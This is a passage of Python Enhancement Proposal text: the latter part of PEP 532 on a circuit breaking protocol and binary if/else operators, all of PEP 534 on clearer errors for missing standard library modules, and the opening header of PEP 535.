_expr_result = LHS
else:
_expr_result = RHS
This PEP proposes changing that expansion to allow the checked condition to
implement a new “circuit breaking” protocol that allows it to see, and
potentially alter, the result of either or both branches of the expression:
_cb = COND
_type_cb = type(cb)
if _cb:
_expr_result = LHS
if hasattr(_type_cb, "__then__"):
_expr_result = _type_cb.__then__(_cb, _expr_result)
else:
_expr_result = RHS
if hasattr(_type_cb, "__else__"):
_expr_result = _type_cb.__else__(_cb, _expr_result)
As shown, interpreter implementations would be required to access only the
protocol method needed for the branch of the conditional expression that is
actually executed. Consistent with other protocol methods, the special methods
would be looked up via the circuit breaker’s type, rather than directly on the
instance.
Circuit breaking operators (binary if and binary else)
The proposed name of the protocol doesn’t come from the proposed changes to
the semantics of conditional expressions. Rather, it comes from the proposed
addition of if and else as general purpose protocol driven
short-circuiting operators to complement the existing True and False
based short-circuiting operators (or and and, respectively) as well
as the None based short-circuiting operator proposed in PEP 505 (??).
Together, these two operators would be known as the circuit breaking operators.
In order to support this usage, the definition of conditional expressions in
the language grammar would be updated to make both the if clause and
the else clause optional:
test: else_test ['if' or_test ['else' test]] | lambdef
else_test: or_test ['else' test]
Note that we would need to avoid the apparent simplification to
else_test ('if' else_test)* in order to make it easier for compiler
implementations to correctly preserve the semantics of normal conditional
expressions.
The definition of the test_nocond node in the grammar (which deliberately
excludes conditional expressions) would remain unchanged, so the circuit
breaking operators would require parentheses when used in the if
clause of comprehensions and generator expressions just as conditional
expressions themselves do.
This grammar definition means precedence/associativity in the otherwise
ambiguous case of expr1 if cond else expr2 else expr3 resolves as
(expr1 if cond else expr2) else epxr3. However, a guideline will also be
added to PEP 8 to say “don’t do that”, as such a construct will be inherently
confusing for readers, regardless of how the interpreter executes it.
The right-associative circuit breaking operator (LHS if RHS) would then
be expanded as follows:
_cb = RHS
_expr_result = LHS if _cb else _cb
While the left-associative circuit breaking operator (LHS else RHS) would
be expanded as:
_cb = LHS
_expr_result = _cb if _cb else RHS
The key point to note in both cases is that when the circuit breaking
expression short-circuits, the condition expression is used as the result of
the expression unless the condition is a circuit breaker. In the latter
case, the appropriate circuit breaker protocol method is called as usual, but
the circuit breaker itself is supplied as the method argument.
This allows circuit breakers to reliably detect short-circuiting by checking
for cases when the argument passed in as the candidate expression result is
self.
Overloading logical inversion (not)
Any circuit breaker definition will have a logical inverse that is still a
circuit breaker, but inverts the answer as to when to short circuit the
expression evaluation. For example, the operator.true and
operator.false circuit breakers proposed in this PEP are each other’s
logical inverse.
A new protocol method, __not__(self), will be introduced to permit circuit
breakers and other types to override not expressions to return their
logical inverse rather than a coerced boolean result.
To preserve the semantics of existing language optimisations (such as
eliminating double negations directly in a boolean context as redundant),
__not__ implementations will be required to respect the following
invariant:
assert not bool(obj) == bool(not obj)
However, symmetric circuit breakers (those that implement all of __bool__,
__not__, __then__ and __else__) would only be expected to respect
the full semantics of boolean logic when all circuit breakers involved in the
expression are using a consistent definition of “truth”. This is covered
further in Respecting De Morgan’s Laws.
Forcing short-circuiting behaviour
Invocation of a circuit breaker’s short-circuiting behaviour can be forced by
using it as all three operands in a conditional expression:
obj if obj else obj
Or, equivalently, as both operands in a circuit breaking expression:
obj if obj
obj else obj
Rather than requiring the using of any of these patterns, this PEP proposes
to add a dedicated function to the operator to explicitly short-circuit
a circuit breaker, while passing other objects through unmodified:
def short_circuit(obj)
"""Replace circuit breakers with their short-circuited result
Passes other input values through unmodified.
"""
return obj if obj else obj
Circuit breaking identity comparisons (is and is not)
In the absence of any standard circuit breakers, the proposed if and
else operators would largely just be unusual spellings of the existing
and and or logical operators.
However, this PEP further proposes to provide a new general purpose
types.CircuitBreaker type that implements the appropriate short
circuiting logic, as well as factory functions in the operator module
that correspond to the is and is not operators.
These would be defined in such a way that the following expressions produce
VALUE rather than False when the conditional check fails:
EXPR if is_sentinel(VALUE, SENTINEL)
EXPR if is_not_sentinel(VALUE, SENTINEL)
And similarly, these would produce VALUE rather than True when the
conditional check succeeds:
is_sentinel(VALUE, SENTINEL) else EXPR
is_not_sentinel(VALUE, SENTINEL) else EXPR
In effect, these comparisons would be defined such that the leading
VALUE if and trailing else VALUE clauses can be omitted as implied in
expressions of the following forms:
# To handle "if" expressions, " else VALUE" is implied when omitted
EXPR if is_sentinel(VALUE, SENTINEL) else VALUE
EXPR if is_not_sentinel(VALUE, SENTINEL) else VALUE
# To handle "else" expressions, "VALUE if " is implied when omitted
VALUE if is_sentinel(VALUE, SENTINEL) else EXPR
VALUE if is_not_sentinel(VALUE, SENTINEL) else EXPR
The proposed types.CircuitBreaker type would represent this behaviour
programmatically as follows:
class CircuitBreaker:
"""Simple circuit breaker type"""
def __init__(self, value, bool_value):
self.value = value
self.bool_value = bool(bool_value)
def __bool__(self):
return self.bool_value
def __not__(self):
return CircuitBreaker(self.value, not self.bool_value)
def __then__(self, result):
if result is self:
return self.value
return result
def __else__(self, result):
if result is self:
return self.value
return result
The key characteristic of these circuit breakers is that they are ephemeral:
when they are told that short circuiting has taken place (by receiving a
reference to themselves as the candidate expression result), they return the
original value, rather than the circuit breaking wrapper.
The short-circuiting detection is defined such that the wrapper will always
be removed if you explicitly pass the same circuit breaker instance to both
sides of a circuit breaking operator or use one as all three operands in a
conditional expression:
breaker = types.CircuitBreaker(foo, foo is None)
assert operator.short_circuit(breaker) is foo
assert (breaker if breaker) is foo
assert (breaker else breaker) is foo
assert (breaker if breaker else breaker) is foo
breaker = types.CircuitBreaker(foo, foo is not None)
assert operator.short_circuit(breaker) is foo
assert (breaker if breaker) is foo
assert (breaker else breaker) is foo
assert (breaker if breaker else breaker) is foo
The factory functions in the operator module would then make it
straightforward to create circuit breakers that correspond to identity
checks using the is and is not operators:
def is_sentinel(value, sentinel):
"""Returns a circuit breaker switching on 'value is sentinel'"""
return types.CircuitBreaker(value, value is sentinel)
def is_not_sentinel(value, sentinel):
"""Returns a circuit breaker switching on 'value is not sentinel'"""
return types.CircuitBreaker(value, value is not sentinel)
Truth checking comparisons
Due to their short-circuiting nature, the runtime logic underlying the and
and or operators has never previously been accessible through the
operator or types modules.
The introduction of circuit breaking operators and circuit breakers allows
that logic to be captured in the operator module as follows:
def true(value):
"""Returns a circuit breaker switching on 'bool(value)'"""
return types.CircuitBreaker(value, bool(value))
def false(value):
"""Returns a circuit breaker switching on 'not bool(value)'"""
return types.CircuitBreaker(value, not bool(value))
LHS or RHS would be effectively true(LHS) else RHS
LHS and RHS would be effectively false(LHS) else RHS
No actual change would take place in these operator definitions, the new
circuit breaking protocol and operators would just provide a way to make the
control flow logic programmable, rather than hardcoding the sense of the check
at development time.
Respecting the rules of boolean logic, these expressions could also be
expanded in their inverted form by using the right-associative circuit
breaking operator instead:
LHS or RHS would be effectively RHS if false(LHS)
LHS and RHS would be effectively RHS if true(LHS)
None-aware operators
If both this PEP and PEP 505’s None-aware operators were accepted, then the
proposed is_sentinel and is_not_sentinel circuit breaker factories
would be used to encapsulate the notion of “None checking”: seeing if a value
is None and either falling back to an alternative value (an operation known
as “None-coalescing”) or passing it through as the result of the overall
expression (an operation known as “None-severing” or “None-propagating”).
Given these circuit breakers, LHS ?? RHS would be roughly equivalent to
both of the following:
is_not_sentinel(LHS, None) else RHS
RHS if is_sentinel(LHS, None)
Due to the way they inject control flow into attribute lookup and subscripting
operations, None-aware attribute access and None-aware subscripting can’t be
expressed directly in terms of the circuit breaking operators, but they can
still be defined in terms of the underlying circuit breaking protocol.
In those terms, EXPR?.ATTR[KEY].SUBATTR() would be semantically
equivalent to:
_lookup_base = EXPR
_circuit_breaker = is_not_sentinel(_lookup_base, None)
_expr_result = _lookup_base.ATTR[KEY].SUBATTR() if _circuit_breaker
Similarly, EXPR?[KEY].ATTR.SUBATTR() would be semantically equivalent
to:
_lookup_base = EXPR
_circuit_breaker = is_not_sentinel(_lookup_base, None)
_expr_result = _lookup_base[KEY].ATTR.SUBATTR() if _circuit_breaker
The actual implementations of the None-aware operators would presumably be
optimised to skip actually creating the circuit breaker instance, but the
above expansions would still provide an accurate description of the observable
behaviour of the operators at runtime.
Rich chained comparisons
Refer to PEP 535 for a detailed discussion of this possible use case.
Other conditional constructs
No changes are proposed to if statements, while statements, comprehensions,
or generator expressions, as the boolean clauses they contain are used
entirely for control flow purposes and never return a result as such.
However, it’s worth noting that while such proposals are outside the scope of
this PEP, the circuit breaking protocol defined here would already be
sufficient to support constructs like:
def is_not_none(obj):
return is_sentinel(obj, None)
while is_not_none(dynamic_query()) as result:
... # Code using result
and:
if is_not_none(re.search(pattern, text)) as match:
... # Code using match
This could be done by assigning the result of
operator.short_circuit(CONDITION) to the name given in the as clause,
rather than assigning CONDITION to the given name directly.
Style guide recommendations
The following additions to PEP 8 are proposed in relation to the new features
introduced by this PEP:
Avoid combining conditional expressions (if-else) and the standalone
circuit breaking operators (if and else) in a single expression -
use one or the other depending on the situation, but not both.
Avoid using conditional expressions (if-else) and the standalone
circuit breaking operators (if and else) as part of if
conditions in if statements and the filter clauses of comprehensions
and generator expressions.
Rationale
Adding new operators
Similar to PEP 335, early drafts of this PEP focused on making the existing
and and or operators less rigid in their interpretation, rather than
proposing new operators. However, this proved to be problematic for a few key
reasons:
the and and or operators have a long established and stable meaning,
so readers would inevitably be surprised if their meaning now became
dependent on the type of the left operand. Even new users would be confused
by this change due to 25+ years of teaching material that assumes the
current well-known semantics for these operators
Python interpreter implementations, including CPython, have taken advantage
of the existing semantics of and and or when defining runtime and
compile time optimisations, which would all need to be reviewed and
potentially discarded if the semantics of those operations changed
it isn’t clear what names would be appropriate for the new methods needed
to define the protocol
Proposing short-circuiting binary variants of the existing if-else ternary
operator instead resolves all of those issues:
the runtime semantics of and and or remain entirely unchanged
while the semantics of the unary not operator do change, the invariant
required of __not__ implementations means that existing expression
optimisations in boolean contexts will remain valid.
__else__ is the short-circuiting outcome for if expressions due to
the absence of a trailing else clause
__then__ is the short-circuiting outcome for else expressions due to
the absence of a leading if clause (this connection would be even clearer
if the method name was __if__, but that would be ambiguous given the
other uses of the if keyword that won’t invoke the circuit breaking
protocol)
Naming the operator and protocol
The names “circuit breaking operator”, “circuit breaking protocol” and
“circuit breaker” are all inspired by the phrase “short circuiting operator”:
the general language design term for operators that only conditionally
evaluate their right operand.
The electrical analogy is that circuit breakers in Python detect and handle
short circuits in expressions before they trigger any exceptions similar to the
way that circuit breakers detect and handle short circuits in electrical
systems before they damage any equipment or harm any humans.
The Python level analogy is that just as a break statement lets you
terminate a loop before it reaches its natural conclusion, a circuit breaking
expression lets you terminate evaluation of the expression and produce a result
immediately.
Using existing keywords
Using existing keywords has the benefit of allowing the new operators to
be introduced without a __future__ statement.
if and else are semantically appropriate for the proposed new protocol,
and the only additional syntactic ambiguity introduced arises when the new
operators are combined with the explicit if-else conditional expression
syntax.
The PEP handles that ambiguity by explicitly specifying how it should be
handled by interpreter implementers, but proposing to point out in PEP 8
that even though interpreters will understand it, human readers probably
won’t, and hence it won’t be a good idea to use both conditional expressions
and the circuit breaking operators in a single expression.
Naming the protocol methods
Naming the __else__ method was straightforward, as reusing the operator
keyword name results in a special method name that is both obvious and
unambiguous.
Naming the __then__ method was less straightforward, as there was another
possible option in using the keyword-based name __if__.
The problem with __if__ is that there would continue to be many cases
where the if keyword appeared, with an expression to its immediate right,
but the __if__ special method would not be invoked. Instead, the
bool() builtin and its underlying special methods (__bool__,
__len__) would be invoked, while __if__ had no effect.
With the boolean protocol already playing a part in conditional expressions and
the new circuit breaking protocol, the less ambiguous name __then__ was
chosen based on the terminology commonly used in computer science and
programming language design to describe the first clause of an if
statement.
Making binary if right-associative
The precedent set by conditional expressions means that a binary
short-circuiting if expression must necessarily have the condition on the
right as a matter of consistency.
With the right operand always being evaluated first, and the left operand not
being evaluated at all if the right operand is true in a boolean context,
the natural outcome is a right-associative operator.
Naming the standard circuit breakers
When used solely with the left-associative circuit breaking operator,
explicit circuit breaker names for unary checks read well if they start with
the preposition if_:
operator.if_true(LHS) else RHS
operator.if_false(LHS) else RHS
However, incorporating the if_ doesn’t read as well when performing
logical inversion:
not operator.if_true(LHS) else RHS
not operator.if_false(LHS) else RHS
Or when using the right-associative circuit breaking operator:
LHS if operator.if_true(RHS)
LHS if operator.if_false(RHS)
Or when naming a binary comparison operation:
operator.if_is_sentinel(VALUE, SENTINEL) else EXPR
operator.if_is_not_sentinel(VALUE, SENTINEL) else EXPR
By contrast, omitting the preposition from the circuit breaker name gives a
result that reads reasonably well in all forms for unary checks:
operator.true(LHS) else RHS # Preceding "LHS if " implied
operator.false(LHS) else RHS # Preceding "LHS if " implied
not operator.true(LHS) else RHS # Preceding "LHS if " implied
not operator.false(LHS) else RHS # Preceding "LHS if " implied
LHS if operator.true(RHS) # Trailing " else RHS" implied
LHS if operator.false(RHS) # Trailing " else RHS" implied
LHS if not operator.true(RHS) # Trailing " else RHS" implied
LHS if not operator.false(RHS) # Trailing " else RHS" implied
And also reads well for binary checks:
operator.is_sentinel(VALUE, SENTINEL) else EXPR
operator.is_not_sentinel(VALUE, SENTINEL) else EXPR
EXPR if operator.is_sentinel(VALUE, SENTINEL)
EXPR if operator.is_not_sentinel(VALUE, SENTINEL)
Risks and concerns
This PEP has been designed specifically to address the risks and concerns
raised when discussing PEPs 335, 505 and 531.
it defines new operators and adjusts the definition of chained comparison
(in a separate PEP) rather than impacting the existing and and or
operators
the proposed new operators are general purpose short-circuiting binary
operators that can even be used to express the existing semantics of and
and or rather than focusing solely and inflexibly on identity checking
against None
the changes to the not unary operator and the is and is not
binary comparison operators are defined in such a way that control flow
optimisations based on the existing semantics remain valid
One consequence of this approach is that this PEP on its own doesn’t produce
much in the way of direct benefits to end users aside from making it possible
to omit some common None if prefixes and else None suffixes from
particular forms of conditional expression.
Instead, what it mainly provides is a common foundation that would allow the
None-aware operator proposals in PEP 505 and the rich comparison chaining
proposal in PEP 535 to be pursued atop a common underlying semantic framework
that would also be shared with conditional expressions and the existing and
and or operators.
Design Discussion
Protocol walk-through
The following diagram illustrates the core concepts behind the circuit
breaking protocol (although it glosses over the technical detail of looking
up the special methods via the type rather than the instance):
We will work through the following expression:
>>> def is_not_none(obj):
... return operator.is_not_sentinel(obj, None)
>>> x if is_not_none(data.get("key")) else y
is_not_none is a helper function that invokes the proposed
operator.is_not_sentinel types.CircuitBreaker factory with None as
the sentinel value. data is a container (such as a builtin dict
instance) that returns None when the get() method is called with an
unknown key.
We can rewrite the example to give a name to the circuit breaker instance:
>>> maybe_value = is_not_none(data.get("key"))
>>> x if maybe_value else y
Here the maybe_value circuit breaker instance corresponds to breaker
in the diagram.
The ternary condition is evaluated by calling bool(maybe_value), which is
the same as Python’s existing behavior. The change in behavior is that instead
of directly returning one of the operands x or y, the circuit breaking
protocol passes the relevant operand to the circuit breaker used in the
condition.
If bool(maybe_value) evaluates to True (i.e. the requested
key exists and its value is not None) then the interpreter calls
type(maybe_value).__then__(maybe_value, x). Otherwise, it calls
type(maybe_value).__else__(maybe_value, y).
The protocol also applies to the new if and else binary operators,
but in these cases, the interpreter needs a way to indicate the missing third
operand. It does this by re-using the circuit breaker itself in that role.
Consider these two expressions:
>>> x if data.get("key") is None
>>> x if operator.is_sentinel(data.get("key"), None)
The first form of this expression returns x if data.get("key") is None,
but otherwise returns False, which almost certainly isn’t what we want.
By contrast, the second form of this expression still returns x if
data.get("key") is None, but otherwise returns data.get("key"), which
is significantly more useful behaviour.
We can understand this behavior by rewriting it as a ternary expression with
an explicitly named circuit breaker instance:
>>> maybe_value = operator.is_sentinel(data.get("key"), None)
>>> x if maybe_value else maybe_value
If bool(maybe_value) is True (i.e. data.get("key") is None),
then the interpreter calls type(maybe_value).__then__(maybe_value, x). The
implementation of types.CircuitBreaker.__then__ doesn’t see anything that
indicates short-circuiting has taken place, and hence returns x.
By contrast, if bool(maybe_value) is False (i.e. data.get("key")
is not None), the interpreter calls
type(maybe_value).__else__(maybe_value, maybe_value). The implementation of
types.CircuitBreaker.__else__ detects that the instance method has received
itself as its argument and returns the wrapped value (i.e. data.get("key"))
rather than the circuit breaker.
The same logic applies to else, only reversed:
>>> is_not_none(data.get("key")) else y
This expression returns data.get("key") if it is not None, otherwise it
evaluates and returns y. To understand the mechanics, we rewrite the
expression as follows:
>>> maybe_value = is_not_none(data.get("key"))
>>> maybe_value if maybe_value else y
If bool(maybe_value) is True, then the expression short-circuits and
the interpreter calls type(maybe_value).__else__(maybe_value, maybe_value).
The implementation of types.CircuitBreaker.__then__ detects that the
instance method has received itself as its argument and returns the wrapped
value (i.e. data.get("key")) rather than the circuit breaker.
If bool(maybe_value) is True, the interpreter calls
type(maybe_value).__else__(maybe_value, y). The implementation of
types.CircuitBreaker.__else__ doesn’t see anything that indicates
short-circuiting has taken place, and hence returns y.
Respecting De Morgan’s Laws
Similar to and and or, the binary short-circuiting operators will
permit multiple ways of writing essentially the same expression. This
seeming redundancy is unfortunately an implied consequence of defining the
protocol as a full boolean algebra, as boolean algebras respect a pair of
properties known as “De Morgan’s Laws”: the ability to express the results
of and and or operations in terms of each other and a suitable
combination of not operations.
For and and or in Python, these invariants can be described as follows:
assert bool(A and B) == bool(not (not A or not B))
assert bool(A or B) == bool(not (not A and not B))
That is, if you take one of the operators, invert both operands, switch to the
other operator, and then invert the overall result, you’ll get the same
answer (in a boolean sense) as you did from the original operator. (This may
seem redundant, but in many situations it actually lets you eliminate double
negatives and find tautologically true or false subexpressions, thus reducing
the overall expression size).
For circuit breakers, defining a suitable invariant is complicated by the
fact that they’re often going to be designed to eliminate themselves from the
expression result when they’re short-circuited, which is an inherently
asymmetric behaviour. Accordingly, that inherent asymmetry needs to be
accounted for when mapping De Morgan’s Laws to the expected behaviour of
symmetric circuit breakers.
One way this complication can be addressed is to wrap the operand that would
otherwise short-circuit in operator.true, ensuring that when bool is
applied to the overall result, it uses the same definition of truth that was
used to decide which branch to evaluate, rather than applying bool directly
to the circuit breaker’s input value.
Specifically, for the new short-circuiting operators, the following properties
would be reasonably expected to hold for any well-behaved symmetric circuit
breaker that implements both __bool__ and __not__:
assert bool(B if true(A)) == bool(not (true(not A) else not B))
assert bool(true(A) else B) == bool(not (not B if true(not A)))
Note the order of operations on the right hand side (applying true
after inverting the input circuit breaker) - this ensures that an
assertion is actually being made about type(A).__not__, rather than
merely being about the behaviour of type(true(A)).__not__.
At the very least, types.CircuitBreaker instances would respect this
logic, allowing existing boolean expression optimisations (like double
negative elimination) to continue to be applied.
Arbitrary sentinel objects
Unlike PEPs 505 and 531, the proposal in this PEP readily handles custom
sentinel objects:
_MISSING = object()
# Using the sentinel to check whether or not an argument was supplied
def my_func(arg=_MISSING):
arg = make_default() if is_sentinel(arg, _MISSING) # "else arg" implied
Implicitly defined circuit breakers in circuit breaking expressions
A never-posted draft of this PEP explored the idea of special casing the
is and is not binary operators such that they were automatically
treated as circuit breakers when used in the context of a circuit breaking
expression. Unfortunately, it turned out that this approach necessarily
resulted in one of two highly undesirable outcomes:
the return type of these expressions changed universally from bool to
types.CircuitBreaker, potentially creating a backwards compatibility
problem (especially when working with extension module APIs that
specifically look for a builtin boolean value with PyBool_Check rather
than passing the supplied value through PyObject_IsTrue or using
the p (predicate) format in one of the argument parsing functions)
the return type of these expressions became context dependent, meaning
that other routine refactorings (like pulling a comparison operation out
into a local variable) could have a significant impact on the runtime
semantics of a piece of code
Neither of those possible outcomes seems warranted by the proposal in this PEP,
so it reverted to the current design where circuit breaker instances must be
created explicitly via API calls, and are never produced implicitly.
Implementation
As with PEP 505, actual implementation has been deferred pending in-principle
interest in the idea of making these changes.
…TBD…
Acknowledgements
Thanks go to Steven D’Aprano for his detailed critique [2] of the initial
draft of this PEP that inspired many of the changes in the second draft, as
well as to all of the other participants in that discussion thread [3].
References
[1]
PEP 335 rejection notification
(https://mail.python.org/pipermail/python-dev/2012-March/117510.html)
[2]
Steven D’Aprano’s critique of the initial draft
(https://mail.python.org/pipermail/python-ideas/2016-November/043615.html)
[3]
python-ideas thread discussing initial draft
(https://mail.python.org/pipermail/python-ideas/2016-November/043563.html)
Copyright
This document has been placed in the public domain under the terms of the
CC0 1.0 license: https://creativecommons.org/publicdomain/zero/1.0/
| Deferred | PEP 532 – A circuit breaking protocol and binary operators | Standards Track | Inspired by PEP 335, PEP 505, PEP 531, and the related discussions, this PEP
proposes the definition of a new circuit breaking protocol (using the
method names __then__ and __else__) that provides a common underlying
semantic foundation for: |
PEP 534 – Improved Errors for Missing Standard Library Modules
Author:
Tomáš Orsava <tomas.n at orsava.cz>,
Petr Viktorin <encukou at gmail.com>,
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Deferred
Type:
Standards Track
Created:
05-Sep-2016
Post-History:
Table of Contents
Abstract
PEP Deferral
Motivation
CPython
Linux and other distributions
Specification
APIs to list expected standard library modules
Changes to the default sys.excepthook implementation
Design Discussion
Modifying sys.excepthook
Public API to query expected standard library module names
Only including top level module names
Listing private top level module names as optional standard library modules
Deeming packaging related modules to be mandatory
Deferred Ideas
Platform dependent modules
Emitting a warning when __main__ shadows a standard library module
Recommendation for Downstream Distributors
Backwards Compatibility
Reference and Example Implementation
Notes and References
Copyright
Abstract
Python is often being built or distributed without its full standard library.
However, there is as of yet no standard, user friendly way of properly
informing the user about the failure to import such missing standard library
modules.
This PEP proposes a mechanism for identifying expected standard library modules
and providing more informative error messages to users when attempts to import
standard library modules fail.
PEP Deferral
The PEP authors aren’t actively working on this PEP, so if improving these
error messages is an idea that you’re interested in pursuing, please get in
touch! (e.g. by posting to the python-dev mailing list).
The key piece of open work is determining how to get the autoconf and Visual
Studio build processes to populate the sysconfig metadata file with the lists
of expected and optional standard library modules.
Motivation
There are several use cases for including only a subset of Python’s standard
library. However, there is so far no user-friendly mechanism for informing
the user why a stdlib module is missing and how to remedy the situation
appropriately.
CPython
When one of Python’s standard library modules (such as _sqlite3) cannot be
compiled during a CPython build because of missing dependencies (e.g. SQLite
header files), the module is simply skipped. If you then install this compiled
Python and use it to try to import one of the missing modules, Python will fail
with a ModuleNotFoundError.
For example, after deliberately removing sqlite-devel from the local
system:
$ ./python -c "import sqlite3"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
from sqlite3.dbapi2 import *
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
from _sqlite3 import *
ModuleNotFoundError: No module named '_sqlite3'
This can confuse users who may not understand why a cleanly built Python is
missing standard library modules.
Linux and other distributions
Many Linux and other distributions are already separating out parts of the
standard library to standalone packages. Among the most commonly excluded
modules are the tkinter module, since it draws in a dependency on the
graphical environment, idlelib, since it depends on tkinter (and most
Linux desktop environments provide their own default code editor), and the
test package, as it only serves to test Python internally and is about as
big as the rest of the standard library put together.
The methods of omission of these modules differ. For example, Debian patches
the file Lib/tkinter/__init__.py to envelop the line import _tkinter in
a try-except block and upon encountering an ImportError it simply adds
the following to the error message: please install the python3-tk package
[1]. Fedora and other distributions simply don’t include the
omitted modules, potentially leaving users baffled as to where to find them.
An example from Fedora 29:
$ python3 -c "import tkinter"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No module named 'tkinter'
Specification
APIs to list expected standard library modules
To allow for easier identification of which module names are expected to be
resolved in the standard library, the sysconfig module will be extended
with two additional functions:
sysconfig.get_stdlib_modules(), which will provide a list of the names of
all top level Python standard library modules (including private modules)
sysconfig.get_optional_modules(), which will list optional public top level
standard library module names
The results of sysconfig.get_optional_modules() and the existing
sys.builtin_module_names will both be subsets of the full list provided by
the new sysconfig.get_stdlib_modules() function.
These added lists will be generated during the Python build process and saved in
the _sysconfigdata-*.py file along with other sysconfig values.
Possible reasons for modules being in the “optional” list will be:
the module relies on an optional build dependency (e.g. _sqlite3,
tkinter, idlelib)
the module is private for other reasons and hence may not be present on all
implementations (e.g. _freeze_importlib, _collections_abc)
the module is platform specific and hence may not be present in all
installations (e.g. winreg)
the test package may also be freely omitted from Python runtime
installations, as it is intended for use in testing Python implementations,
not as a runtime library for Python projects to use (the public API offering
testing utilities is unittest)
(Note: the ensurepip, venv, and distutils modules are all considered
mandatory modules in this PEP, even though not all redistributors currently
adhere to that practice)
Changes to the default sys.excepthook implementation
The default implementation of the sys.excepthook function will then be
modified to dispense an appropriate message when it detects a failure to
import a module identified by one of the two new sysconfig functions as
belonging to the Python standard library.
Revised error message for a module that relies on an optional build dependency
or is otherwise considered optional when Python is installed:
$ ./python -c "import sqlite3"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
from sqlite3.dbapi2 import *
File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
from _sqlite3 import *
ModuleNotFoundError: Optional standard library module '_sqlite3' was not found
Revised error message for a submodule of an optional top level package when the
entire top level package is missing:
$ ./python -c "import test.regrtest"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: Optional standard library module 'test' was not found
Revised error message for a submodule of an optional top level package when the
top level package is present:
$ ./python -c "import test.regrtest"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No submodule named 'test.regrtest' in optional standard library module 'test'
Revised error message for a module that is always expected to be available:
$ ./python -c "import ensurepip"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: Standard library module 'ensurepip' was not found
Revised error message for a missing submodule of a standard library package when
the top level package is present:
$ ./python -c "import encodings.mbcs"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No submodule named 'encodings.mbcs' in standard library module 'encodings'
These revised error messages make it clear that the missing modules are expected
to be available from the standard library, but are not available for some reason,
rather than being an indicator of a missing third party dependency in the current
environment.
Design Discussion
Modifying sys.excepthook
The sys.excepthook function gets called when a raised exception is uncaught
and the program is about to exit or (in an interactive session) the control is
being returned to the prompt. This makes it a perfect place for customized
error messages, as it will not influence caught errors and thus not slow down
normal execution of Python scripts.
Public API to query expected standard library module names
The inclusion of the functions sysconfig.get_stdlib_modules() and
sysconfig.get_optional_modules() will provide a long sought-after
way of easily listing the names of Python standard library modules
[2], which will (among other benefits) make it easier for
code analysis, profiling, and error reporting tools to offer runtime
--ignore-stdlib flags.
Only including top level module names
This PEP proposes that only top level module and package names be reported by
the new query APIs. This is sufficient information to generate the proposed
error messages, reduces the number of required entries by an order of magnitude,
and simplifies the process of generating the related metadata during the build
process.
If this is eventually found to be overly limiting, a new include_submodules
flag could be added to the query APIs. However, this is not part of the initial
proposal, as the benefits of doing so aren’t currently seen as justifying the
extra complexity.
There is one known consequence of this restriction, which is that the new
default excepthook implementation will report incorrect submodules names the
same way that it reports genuinely missing standard library submodules:
$ ./python -c "import unittest.muck"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No submodule named 'unittest.muck' in standard library module 'unittest'
Listing private top level module names as optional standard library modules
Many of the modules that have an optional external build dependency are written
as hybrid modules, where there is a shared Python wrapper around an
implementation dependent interface to the underlying external library. In other
cases, a private top level module may simply be a CPython implementation detail,
and other implementations may not provide that module at all.
To report import errors involving these modules appropriately, the new default
excepthook implementation needs them to be reported by the new query APIs.
Deeming packaging related modules to be mandatory
Some redistributors aren’t entirely keen on installing the Python specific
packaging related modules (distutils, ensurepip, venv) by default,
preferring that developers use their platform specific tooling instead.
This approach causes interoperability problems for developers working on
cross-platform projects and educators attempting to write platform independent
setup instructions, so this PEP takes the view that these modules should be
considered mandatory, and left out of the list of optional modules.
Deferred Ideas
The ideas in this section are concepts that this PEP would potentially help
enable, but they’re considered out of scope for the initial proposal.
Platform dependent modules
Some standard library modules may be missing because they’re only provided on
particular platforms. For example, the winreg module is only available on
Windows:
$ python3 -c "import winreg"
Traceback (most recent call last):
File "<string>", line 1, in <module>
ModuleNotFoundError: No module named 'winreg'
In the current proposal, these platform dependent modules will simply be
included with all the other optional modules rather than attempting to expose
the platform dependency information in a more structured way.
However, the platform dependence is at least tracked at the level of “Windows”,
“Unix”, “Linux”, and “FreeBSD” for the benefit of the documentation, so it
seems plausible that it could potentially be exposed programmatically as well.
Emitting a warning when __main__ shadows a standard library module
Given the new query APIs, the new default excepthook implementation could
potentially detect when __main__.__file__ or __main__.__spec__.name
match a standard library module, and emit a suitable warning.
However, actually doing anything along this lines should review more cases where
uses actually encounter this problem, and the various options for potentially
offering more information to assist in debugging the situation, rather than
needing to be incorporated right now.
Recommendation for Downstream Distributors
By patching site.py [*] to provide their own implementation of the
sys.excepthook function, Python distributors can display tailor-made
error messages for any uncaught exceptions, including informing the user of
a proper, distro-specific way to install missing standard library modules upon
encountering a ModuleNotFoundError.
Some downstream distributors are already using this method of patching
sys.excepthook to integrate with platform crash reporting mechanisms.
Backwards Compatibility
No problems with backwards compatibility are expected. Distributions that are
already patching Python modules to provide custom handling of missing
dependencies can continue to do so unhindered.
Reference and Example Implementation
TBD. The finer details will depend on what’s practical given the capabilities
of the CPython build system (other implementations should then be able to use
the generated CPython data, rather than having to regenerate it themselves).
Notes and References
[*]
Or sitecustomize.py for organizations with their own custom
Python variant.
[1]
http://bazaar.launchpad.net/~doko/python/pkg3.5-debian/view/head:/patches/tkinter-import.diff
[2]
http://stackoverflow.com/questions/6463918/how-can-i-get-a-list-of-all-the-python-standard-library-modules
Ideas leading up to this PEP were discussed on the python-dev mailing list
and subsequently on python-ideas.
Copyright
This document has been placed in the public domain.
| Deferred | PEP 534 – Improved Errors for Missing Standard Library Modules | Standards Track | Python is often being built or distributed without its full standard library.
However, there is as of yet no standard, user friendly way of properly
informing the user about the failure to import such missing standard library
modules. |
PEP 535 – Rich comparison chaining
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Deferred
Type:
Standards Track
Requires:
532
Created:
